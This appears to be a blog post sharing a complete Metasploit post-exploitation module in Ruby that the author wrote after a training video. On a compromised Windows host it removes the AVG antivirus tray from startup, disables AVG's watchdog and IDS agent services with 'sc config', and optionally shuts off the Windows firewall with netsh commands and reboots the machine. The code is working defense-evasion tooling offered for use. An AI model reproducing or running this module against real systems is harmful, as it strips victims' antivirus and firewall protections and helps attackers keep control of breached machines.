I was re-watching/restudying some of the videos for Metasploit Framework Expert. One video in particular “Lesson 7: Post Exploitation Kill AV and Bypass Firewall”, made me decided to automate the task with a post exploit module.
##
# $Id: kill_avg_2012.rb 2012-05-12 02:19:00Z $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Stop AVG',
'Description' => %q{ This module removes the AVG tray from starting in the registry. It also changes the startup mode of avg watchdog and AVGIDSAgent from automatic to disabled. },
'License' => BSD_LICENSE,
'Author' => [ '3vi1john Jbabio@me.com'],
'Version' => '$Revision: 20 ${body}#39;,
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptBool.new( 'REBOOT', [ false, 'Reboot', false]),
OptBool.new( 'KILLFW', [ false, 'Turn the Windows firwall off', true]),
], self.class)
end
def rem_avg_tray_x86
begin
key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
value = "AVG_TRAY"
v = registry_getvaldata(key, value)
print_status "Checking for AVG Tray..."
if v == '"C:\Program Files\AVG\AVG2012\avgtray.exe"'
print_status "\tAVG_TRAY found; removing it..."
registry_deleteval(key, value)
else
print_status "\tAVG_TRAY is already gone..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
def rem_avg_tray_amd64
begin
key = "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
value = "AVG_TRAY"
v = registry_getvaldata(key, value)
print_status "Checking for AVG Tray..."
if v == '"C:\Program Files (x86)\AVG\AVG2012\avgtray.exe"'
print_status "\tAVG_TRAY found; removing it..."
registry_deleteval(key, value)
else
print_status "\tAVG_TRAY is already gone..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
def rem_avg_services
begin
key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\avgwd"
value = "Start"
v = registry_getvaldata(key, value)
if v == 2
print_status "\tService avgwd is set to Auto..."
print_status "\tChanging avgwd service from auto to disabled..."
cmd_exec('sc', 'config avgwd start= disabled', 30)
else v == 4
print_status "\tService avgwd is already Disabled..."
end
key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\AVGIDSAgent"
value = "Start"
if v == 2
print_status "\tService AVGIDSAgent is set to Auto..."
print_status "\tChanging AVGIDSAgent service from auto to disabled..."
cmd_exec('sc', 'config AVGIDSAgent start= disabled', 30)
else v == 4
print_status "\tService AVGIDSAgent is already Disabled..."
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
def kill_firewall
begin
sysnfo = client.sys.config.sysinfo['OS']
if sysnfo =~/Windows XP/
print_status "\tKilling #{sysnfo} Firewall..."
cmd_exec('netsh', 'firewall set opmode MODE = disable', 30)
else sysnfo =~/Windows 7|Server 2008|Windows Vista/
print_status "\tKilling #{sysnfo} Firewall..."
cmd_exec('netsh', 'advfirewall set allprofiles state off', 30)
end
rescue::Exception => e
print_status "\tThe following Error was encountered: #{e.class} #{e}"
end
end
def run
begin
arch = client.sys.config.sysinfo['Architecture']
if arch =~/x86/
rem_avg_tray_x86
rem_avg_services
else arch =~/x64/
rem_avg_tray_amd64
rem_avg_services
end
if datastore['REBOOT']
session.console.run_single("reboot")
end
if datastore['KILLFW']
kill_firewall
end
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
print_status "\tDone!"
end
end
No comments:
Post a Comment